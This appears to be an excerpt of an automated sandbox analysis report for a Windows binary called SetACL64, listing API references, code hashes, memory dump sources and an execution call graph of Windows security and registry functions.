                                        • API String ID: 1187470696-113136155
                                        • Opcode ID: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                                        • Instruction ID: 59a7c56662fe0585a78ada248211c21d1f01f0b7b7c8dea79e57ac2d99e4c934
                                        • Opcode Fuzzy Hash: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
                                        • Instruction Fuzzy Hash: 8D210CB6B19685CBD760DF28A44026AB2B0FF99740F505539F68DC2B59DE3EE940CF10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Stringtry_get_function
                                        • String ID: LCMapStringEx
                                        • API String ID: 2588686239-3893581201
                                        • Opcode ID: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                                        • Instruction ID: fbb7a8124e634d47ddc661e267f5e0e0d79930bc8d2f7bf0fe4fd282e72aad5a
                                        • Opcode Fuzzy Hash: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
                                        • Instruction Fuzzy Hash: B9111F75608B81C6D760CB55F4402AAB7A5FBC9B94F54413AEE8D83B59CF3CD940CB50
                                        APIs
                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF686861032), ref: 00007FF686864C5C
                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF686861032), ref: 00007FF686864CA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ExceptionFileHeaderRaise
                                        • String ID: csm
                                        • API String ID: 2573137834-1018135373
                                        • Opcode ID: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                                        • Instruction ID: 509d05affecd9687fde46f332d5fc763d4ccfab1ca4acac19bfc92b72282d869
                                        • Opcode Fuzzy Hash: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                                        • Instruction Fuzzy Hash: FF116A72618B8582EB218B15F44426D77A1FF88B94F188238EF8D47768DF3DC865CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocErrorLast
                                        • String ID: tss
                                        • API String ID: 4252645092-1638339373
                                        • Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                        • Instruction ID: a11df8f786bfa0ccf698798408ed79a78af0db7317c593decb86be274f8abf57
                                        • Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                        • Instruction Fuzzy Hash: 6D01D6A1E58647C2E610AB34E84507823B0BF98314FA00238DB5DC27F1DE7EED05C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: AllocErrorLast
                                        • String ID: tss
                                        • API String ID: 4252645092-1638339373
                                        • Opcode ID: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                                        • Instruction ID: 13c69d378c8c6b7d666bc33ef0b0e86891341237a0e7b1264ce052a9be19e315
                                        • Opcode Fuzzy Hash: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                                        • Instruction Fuzzy Hash: 0EF04FB1A08A46C6E7209B24E99407963A1BF98354FA00138D79DC2AF5DF7EED04C720
                                        APIs
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF686877FC9
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF6868817EE,?,?,?,00007FF6868816E6,?,?,?,00007FF6868837A6), ref: 00007FF686877FE3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 539475747-3084827643
                                        • Opcode ID: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
                                        • Instruction ID: 8cd4ffb83508f422bca7aa44c7f5e98c20653e27892896af19983fc19633841f
                                        • Opcode Fuzzy Hash: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
                                        • Instruction Fuzzy Hash: 31F082A5B09B41D2F7048B52F5404B96321BF88B90F48503EEA4D43B65CF7EEC85C760
                                        APIs
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF686877E85
                                        • TlsSetValue.KERNEL32(?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686877E9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valuetry_get_function
                                        • String ID: FlsSetValue
                                        • API String ID: 738293619-3750699315
                                        • Opcode ID: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                                        • Instruction ID: e171108f43b51ee5c4df3fa4c0ebc6c02f8155f3e7ecbd11ca202dcd8f25d581
                                        • Opcode Fuzzy Hash: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                                        • Instruction Fuzzy Hash: 7DE065E6B09646D2EB045B51F4005B82362BF88B80F58403DDA1D86765CF3EDC94C720

                                        Execution Graph

                                        Execution Coverage:4.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:1736
                                        Total number of Limit Nodes:56
                                        execution_graph 41489 7ff686856b2a 41490 7ff686856b45 41489->41490 41491 7ff686856b33 41489->41491 41492 7ff686856b59 41490->41492 41493 7ff686856cbf 41490->41493 41754 7ff686833f80 41491->41754 41497 7ff686833f80 35 API calls 41492->41497 41494 7ff686856cc5 41493->41494 41495 7ff686856d0f 41493->41495 41498 7ff686856cd2 CreateFileW 41494->41498 41499 7ff686856ccf 41494->41499 41500 7ff686856d19 41495->41500 41501 7ff686856e55 41495->41501 41502 7ff686856b83 41497->41502 41503 7ff686856d0a 41498->41503 41504 7ff686856e36 41498->41504 41499->41498 41585 7ff68684a350 41500->41585 41501->41504 41507 7ff686856e5b 41501->41507 41506 7ff686833f80 35 API calls 41502->41506 41509 7ff686856d57 GetKernelObjectSecurity 41503->41509 41512 7ff686856e43 RegCloseKey 41504->41512 41513 7ff686856d3e 41504->41513 41511 7ff686856baf 41506->41511 41769 7ff686829520 41507->41769 41514 7ff686856d7e 41509->41514 41525 7ff686856e11 ctype 41509->41525 41510 7ff686856d34 41510->41504 41510->41509 41510->41513 41768 7ff6868342a0 58 API calls 3 library calls 41511->41768 41512->41513 41517 7ff686856e67 41513->41517 41520 7ff686856ef1 GetNamedSecurityInfoW 41513->41520 41522 7ff686856d8e GetLastError 41514->41522 41523 7ff686856df1 GetKernelObjectSecurity 41514->41523 41516 7ff686856e2d CloseHandle 41516->41504 41518 7ff686856fdc MakeAbsoluteSD GetLastError 41517->41518 41519 7ff686856da1 ctype 41517->41519 41521 7ff686857032 GetLastError 41518->41521 41541 7ff68685708e ctype 41518->41541 41527 7ff686856dce ctype 41519->41527 41580 7ff68685743f 41519->41580 41520->41517 41520->41519 41521->41519 41521->41527 41522->41519 41522->41527 41523->41525 41524 7ff686856bc0 ctype 41524->41493 41526 7ff686856c5c 41524->41526 41528 7ff686857445 41524->41528 41529 7ff68685744b 41524->41529 41525->41504 41525->41516 41531 7ff686856c93 ctype 41526->41531 41526->41580 41786 7ff686862180 41527->41786 41532 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41528->41532 41535 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41529->41535 41531->41527 41532->41529 41534 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41534->41528 41536 7ff686857451 41535->41536 41537 7ff686857452 41536->41537 41538 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41537->41538 41540 7ff686857457 41538->41540 41539 7ff68685765d ctype 41548 7ff686857fe7 41539->41548 41554 7ff6868576aa ctype 41539->41554 41540->41539 41800 7ff686856970 33 API calls 3 library calls 41540->41800 41542 7ff68685716f 41541->41542 41782 7ff68683be10 35 API calls 4 library calls 41541->41782 41545 7ff686857189 MakeAbsoluteSD 41542->41545 41783 7ff68683be10 35 API calls 4 library calls 41542->41783 41546 7ff6868571e6 IsValidSid 41545->41546 41547 7ff68685720f 41545->41547 41546->41547 41551 7ff6868571f3 ctype 41546->41551 41552 7ff686857218 IsValidSid 41547->41552 41553 7ff686857241 41547->41553 41555 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41548->41555 41550 7ff686857185 41550->41545 41784 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41551->41784 41552->41553 41557 7ff686857225 ctype 41552->41557 41558 7ff686857257 ctype 41553->41558 41559 7ff68685724f LocalFree 41553->41559 41560 7ff686862180 _handle_error 8 API calls 41554->41560 41556 7ff686857fed 41555->41556 41564 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41556->41564 41785 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41557->41785 41567 7ff68685726b IsValidSecurityDescriptor 41558->41567 41568 7ff686857347 GetLastError 41558->41568 41559->41558 41562 7ff6868576f8 41560->41562 41563 7ff686857ef9 ctype 41563->41539 41569 7ff686857fdc 41563->41569 41570 7ff686857fe1 41563->41570 41584 7ff686858005 41563->41584 41571 7ff686857ff3 41564->41571 41565 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41572 7ff68685800b 41565->41572 41567->41568 41576 7ff68685727d ctype 41567->41576 41568->41576 41573 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41569->41573 41574 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41570->41574 41575 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41571->41575 41573->41570 41574->41548 41577 7ff686857ff9 41575->41577 41576->41519 41576->41537 41578 7ff68685743a 41576->41578 41801 7ff686829910 41577->41801 41795 7ff6868688fc 41578->41795 41580->41534 41584->41565 41586 7ff68684a42e 41585->41586 41804 7ff68683c460 41586->41804 41593 7ff68684a5e9 41594 7ff686833f80 35 API calls 41593->41594 41623 7ff68684a591 ctype 41593->41623 41594->41623 41595 7ff68684a48d 41598 7ff68684b512 41595->41598 41601 7ff686833f80 35 API calls 41595->41601 41596 7ff68684a64c 41599 7ff686833f80 35 API calls 41596->41599 41597 7ff68684a664 41600 7ff686833f80 35 API calls 41597->41600 42143 7ff686834230 31 API calls 2 library calls 41598->42143 41620 7ff68684a65f ctype 41599->41620 41603 7ff68684a68e ctype 41600->41603 41615 7ff68684a4fa ctype 41601->41615 41605 7ff68684b703 41603->41605 41608 7ff68684b6fe 41603->41608 41610 7ff686833f80 35 API calls 41603->41610 41604 7ff68684b6b4 42144 7ff686834230 31 API calls 2 library calls 41604->42144 41609 7ff686829910 33 API calls 41605->41609 41607 7ff686860c18 13 API calls 41639 7ff68684a788 41607->41639 41612 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41608->41612 41613 7ff68684b709 41609->41613 41614 7ff68684a72c 41610->41614 41611 7ff68684b6be 42145 7ff686834230 31 API calls 2 library calls 41611->42145 41612->41605 41619 7ff686829520 35 API calls 41613->41619 41614->41608 41614->41620 41615->41605 41615->41608 41617 7ff686833f80 35 API calls 41615->41617 41617->41623 41618 7ff68684b6c8 42146 7ff686834230 31 API calls 2 library calls 41618->42146 41622 7ff68684b76e 41619->41622 41620->41607 41823 7ff68684bc40 41622->41823 41623->41596 41623->41597 41623->41608 41624 7ff68684b6d2 41625 7ff686862180 _handle_error 8 API calls 41624->41625 41626 7ff68684b6e3 41625->41626 41626->41510 41628 7ff68684a840 41630 7ff686860c18 13 API calls 41628->41630 41647 7ff68684aa87 41628->41647 41676 7ff68684a8a5 41630->41676 41631 7ff68684a350 245 API calls 41632 7ff68684b7ad 41631->41632 41686 7ff68684bb51 ctype 41632->41686 42147 7ff6868621d4 41632->42147 41633 7ff68684bc26 41638 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41633->41638 41634 7ff686862180 _handle_error 8 API calls 41637 7ff68684bc06 41634->41637 41635 7ff68682c870 70 API calls 41635->41639 41637->41510 41643 7ff68684bc2c 41638->41643 41639->41628 41639->41635 41640 7ff68684b7c9 memcpy_s 41645 7ff68684b7eb RegEnumKeyExW 41640->41645 41641 7ff68684ab9b 41644 7ff686860c18 13 API calls 41641->41644 41642 7ff68684ab79 41646 7ff686833f80 35 API calls 41642->41646 41648 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41643->41648 41697 7ff68684aba2 41644->41697 41671 7ff68684b81f ctype 41645->41671 41748 7ff68684ab8f Concurrency::details::SchedulerBase::GetBitSet SimpleUString::operator= 41646->41748 41647->41641 41647->41642 41650 7ff68684bc32 41648->41650 41649 7ff68684b920 41652 7ff68684b9df 41649->41652 41653 7ff68684b930 41649->41653 41655 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41650->41655 41651 7ff68682c870 70 API calls 41651->41676 41658 7ff68684b9eb RegCloseKey 41652->41658 41699 7ff68684b9f1 ctype 41652->41699 41656 7ff68684b93c 41653->41656 41657 7ff68684b935 RegCloseKey 41653->41657 41654 7ff68684a960 41654->41647 41660 7ff686860c18 13 API calls 41654->41660 41661 7ff68684bc38 41655->41661 41663 7ff68684b971 ctype 41656->41663 41672 7ff68684bc21 41656->41672 41657->41656 41658->41699 41707 7ff68684a9c5 41660->41707 42219 7ff686833e30 33 API calls 41661->42219 41662 7ff686833f80 35 API calls 41662->41671 42154 7ff686829720 31 API calls 2 library calls 41663->42154 41664 7ff68684bb05 41667 7ff68684bb3c ctype 41664->41667 41664->41672 41665 7ff68684b488 42133 7ff686829420 31 API calls 2 library calls 41665->42133 41666 7ff68684b4a0 41690 7ff68684b4eb 41666->41690 42135 7ff686829cb0 35 API calls 41666->42135 42217 7ff686829720 31 API calls 2 library calls 41667->42217 41671->41643 41671->41649 41671->41662 41684 7ff68684b8e6 RegEnumKeyExW 41671->41684 42153 7ff686830360 35 API calls 3 library calls 41671->42153 41678 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41672->41678 41673 7ff68684b986 41673->41633 41685 7ff68684b9be ctype 41673->41685 41675 7ff68684b497 42134 7ff686834230 31 API calls 2 library calls 41675->42134 41676->41651 41676->41654 41678->41633 41683 7ff68684ac60 41688 7ff686860c18 13 API calls 41683->41688 41703 7ff68684aea7 41683->41703 41684->41671 41685->41634 41686->41633 41686->41685 42218 7ff686829720 31 API calls 2 library calls 41686->42218 41687 7ff68684b4d5 42136 7ff686834230 31 API calls 2 library calls 41687->42136 41721 7ff68684acc5 41688->41721 41690->41598 41691 7ff68684b54c 41690->41691 41696 7ff68684b526 RegConnectRegistryW 41690->41696 41698 7ff68684b55f RegOpenKeyExW 41691->41698 41693 7ff68682c870 70 API calls 41693->41707 41695 7ff68682c870 70 API calls 41695->41697 41696->41598 41696->41691 41697->41683 41697->41695 41702 7ff68684b58b 41698->41702 41699->41650 41699->41661 41699->41664 42155 7ff68682aa20 41699->42155 42166 7ff68682ac70 41699->42166 42171 7ff68684b710 41699->42171 41700 7ff68684afbb 41705 7ff686860c18 13 API calls 41700->41705 41701 7ff68684af99 41704 7ff686833f80 35 API calls 41701->41704 41706 7ff68684b676 41702->41706 41709 7ff68684b5a7 RegCreateKeyExW 41702->41709 41703->41700 41703->41701 41704->41748 41729 7ff68684afc2 41705->41729 41706->41598 41708 7ff68684b68e RegCloseKey 41706->41708 41707->41647 41707->41693 41708->41598 41711 7ff68684b5e6 41709->41711 41712 7ff68684b652 41709->41712 41710 7ff68684ad80 41710->41703 41713 7ff686860c18 13 API calls 41710->41713 42137 7ff686829cb0 35 API calls 41711->42137 41712->41706 41715 7ff68684b65f RegCloseKey 41712->41715 41738 7ff68684ade5 41713->41738 41715->41706 41716 7ff68684b5f9 42138 7ff686829d20 35 API calls 41716->42138 41718 7ff68684b60d 42139 7ff6868294c0 35 API calls 41718->42139 41719 7ff68682c870 70 API calls 41719->41721 41721->41710 41721->41719 41722 7ff68684b620 42140 7ff686834230 31 API calls 2 library calls 41722->42140 41723 7ff68684b080 41724 7ff686860c18 13 API calls 41723->41724 41731 7ff68684b2c0 Concurrency::details::SchedulerBase::GetBitSet 41723->41731 41746 7ff68684b0e5 41724->41746 41726 7ff68682c870 70 API calls 41726->41729 41727 7ff68684b637 42141 7ff686834230 31 API calls 2 library calls 41727->42141 41728 7ff68682c870 70 API calls 41728->41738 41729->41723 41729->41726 41733 7ff686860c18 13 API calls 41731->41733 41731->41748 41732 7ff68684b641 42142 7ff686834230 31 API calls 2 library calls 41732->42142 41735 7ff68684b386 41733->41735 42129 7ff686829b00 70 API calls 41735->42129 41737 7ff68684b3aa 41741 7ff686860c18 13 API calls 41737->41741 41737->41748 41738->41703 41738->41728 41739 7ff68684b1a0 41739->41731 41740 7ff686860c18 13 API calls 41739->41740 41752 7ff68684b205 41740->41752 41742 7ff68684b3b5 41741->41742 42130 7ff686829b00 70 API calls 41742->42130 41744 7ff68684b3d9 41747 7ff686860c18 13 API calls 41744->41747 41744->41748 41745 7ff68682c870 70 API calls 41745->41746 41746->41739 41746->41745 41749 7ff68684b3e4 41747->41749 41748->41598 41748->41666 42132 7ff686829d90 35 API calls 41748->42132 42131 7ff686829b00 70 API calls 41749->42131 41751 7ff68682c870 70 API calls 41751->41752 41752->41731 41752->41751 41758 7ff686833fb0 ctype 41754->41758 41760 7ff686833ff9 41754->41760 41755 7ff686834110 42311 7ff686833e30 33 API calls 41755->42311 41757 7ff68683401b 41761 7ff68683410a Concurrency::cancel_current_task 41757->41761 41762 7ff6868621d4 std::_Facet_Register 5 API calls 41757->41762 41758->41490 41760->41755 41760->41757 41760->41761 41763 7ff686834094 41760->41763 41761->41755 41767 7ff686834081 ctype 41762->41767 41764 7ff6868621d4 std::_Facet_Register 5 API calls 41763->41764 41763->41767 41764->41767 41765 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41766 7ff686834109 41765->41766 41766->41761 41767->41765 41768->41524 41770 7ff68682954d 41769->41770 41771 7ff68682960c Concurrency::cancel_current_task 41770->41771 41773 7ff6868295c6 41770->41773 41774 7ff68682959f 41770->41774 41779 7ff68682955b ctype 41770->41779 42312 7ff686828e00 31 API calls 2 library calls 41771->42312 41777 7ff6868621d4 std::_Facet_Register 5 API calls 41773->41777 41773->41779 41774->41771 41776 7ff6868621d4 std::_Facet_Register 5 API calls 41774->41776 41775 7ff686829634 ctype 41775->41517 41778 7ff6868295b0 41776->41778 41777->41779 41778->41779 41780 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41778->41780 41779->41517 41781 7ff68682960b 41780->41781 41781->41771 41782->41542 41783->41550 41784->41547 41785->41553 41787 7ff686862189 41786->41787 41788 7ff68685741f 41787->41788 41789 7ff686862b14 IsProcessorFeaturePresent 41787->41789 41790 7ff686862b2c 41789->41790 42313 7ff686862d08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41790->42313 41792 7ff686862b3f 42314 7ff686862ae0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41792->42314 42315 7ff68686882c 31 API calls 3 library calls 41795->42315 41797 7ff686868915 42316 7ff68686892c 17 API calls _invalid_parameter_noinfo_noreturn 41797->42316 41800->41563 42317 7ff686861034 33 API calls Concurrency::cancel_current_task 41801->42317 41805 7ff68683c48e ctype 41804->41805 42220 7ff68683c5b0 41805->42220 41807 7ff686862180 _handle_error 8 API calls 41809 7ff68683c594 41807->41809 41808 7ff68683c519 ctype 41808->41807 41810 7ff686860c18 41809->41810 42224 7ff68686125c 41810->42224 41812 7ff686860c3a 41818 7ff686860c5d ctype 41812->41818 42232 7ff686860e14 5 API calls std::_Facet_Register 41812->42232 41814 7ff686860c52 42233 7ff686860e44 EncodePointer std::locale::_Setgloballocale 41814->42233 41817 7ff68684a44a 41819 7ff6868544d0 41817->41819 42228 7ff6868612d4 41818->42228 41822 7ff6868544ff 41819->41822 41820 7ff68682c870 70 API calls 41820->41822 41821 7ff68684a45d 41821->41593 41821->41595 41822->41820 41822->41821 41824 7ff68684bd43 IsValidSid 41823->41824 41825 7ff68684bd59 41823->41825 41824->41825 41826 7ff68684bd4d 41824->41826 41828 7ff68684bd7c IsValidSid 41825->41828 41829 7ff68684bd92 41825->41829 42255 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41826->42255 41828->41829 41830 7ff68684bd86 41828->41830 41832 7ff686829520 35 API calls 41829->41832 41884 7ff68684c031 ctype 41829->41884 42256 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41830->42256 41834 7ff68684bdbf 41832->41834 41833 7ff686829520 35 API calls 41835 7ff68684c0e9 41833->41835 41836 7ff686829520 35 API calls 41834->41836 42235 7ff686844440 41835->42235 41838 7ff68684bdd3 41836->41838 41842 7ff68683c460 8 API calls 41838->41842 41839 7ff68684e472 42294 7ff686833e30 33 API calls 41839->42294 41840 7ff68684e45a 42293 7ff686833e30 33 API calls 41840->42293 41847 7ff68684be2b 41842->41847 41845 7ff68682aa20 35 API calls 41850 7ff68684c36f 41845->41850 41846 7ff68684e478 41853 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41846->41853 41858 7ff68683c460 8 API calls 41847->41858 41848 7ff68682aa20 35 API calls 41851 7ff68684c14b 41848->41851 41849 7ff68684e460 41855 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41849->41855 41852 7ff68682ac70 35 API calls 41850->41852 41854 7ff68682ac70 35 API calls 41851->41854 41856 7ff68684c38b 41852->41856 41857 7ff68684e47e 41853->41857 41859 7ff68684c165 41854->41859 41860 7ff68684e466 41855->41860 41861 7ff686833f80 35 API calls 41856->41861 41864 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41857->41864 41862 7ff68684be7a 41858->41862 41863 7ff686833f80 35 API calls 41859->41863 41866 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41860->41866 41889 7ff68684c3eb ctype 41861->41889 41865 7ff686860c18 13 API calls 41862->41865 41876 7ff68684c1c2 ctype 41863->41876 41867 7ff68684e484 41864->41867 41868 7ff68684be84 41865->41868 41869 7ff68684e46c 41866->41869 41870 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41867->41870 42257 7ff686835cf0 70 API calls 41868->42257 41871 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41869->41871 41872 7ff68684e48a 41870->41872 41871->41839 42295 7ff686833e30 33 API calls 41872->42295 41875 7ff68684e490 41878 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41875->41878 41876->41849 41876->41860 41876->41869 42260 7ff686856970 33 API calls 3 library calls 41876->42260 41881 7ff68684e496 41878->41881 41879 7ff68684c2de 42261 7ff686856970 33 API calls 3 library calls 41879->42261 41880 7ff68684beb8 41880->41884 41891 7ff68684beeb ctype 41880->41891 41885 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41881->41885 41883 7ff68684c2e8 41883->41839 41883->41845 42005 7ff68684c00f ctype 41883->42005 42128 7ff68684e424 41883->42128 41884->41833 41886 7ff68684e454 41884->41886 41918 7ff68684e44e 41884->41918 41888 7ff68684e49c 41885->41888 41890 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41886->41890 41887 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41887->41886 41895 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41888->41895 41889->41846 41889->41857 41889->41867 41889->41889 41898 7ff686829520 35 API calls 41889->41898 41890->41840 41891->41886 41891->41918 42258 7ff686856970 33 API calls 3 library calls 41891->42258 41892 7ff686862180 _handle_error 8 API calls 41894 7ff68684b779 41892->41894 41894->41631 41894->41686 41899 7ff68684e4a2 41895->41899 41896 7ff68684bfcc 42259 7ff686856970 33 API calls 3 library calls 41896->42259 41897 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41901 7ff68684e42a 41897->41901 41902 7ff68684c803 41898->41902 41904 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41899->41904 41905 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41901->41905 41908 7ff68684c83b 41902->41908 41909 7ff68684cd69 41902->41909 41903 7ff68684bfd6 41910 7ff68684e448 41903->41910 41903->42005 41906 7ff68684e4a8 41904->41906 41907 7ff68684e430 41905->41907 41915 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41906->41915 41911 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41907->41911 41913 7ff68684cadc 41908->41913 41914 7ff68684c84f 41908->41914 41919 7ff686829520 35 API calls 41909->41919 42012 7ff68684cdc2 ctype 41909->42012 41912 7ff6868688fc 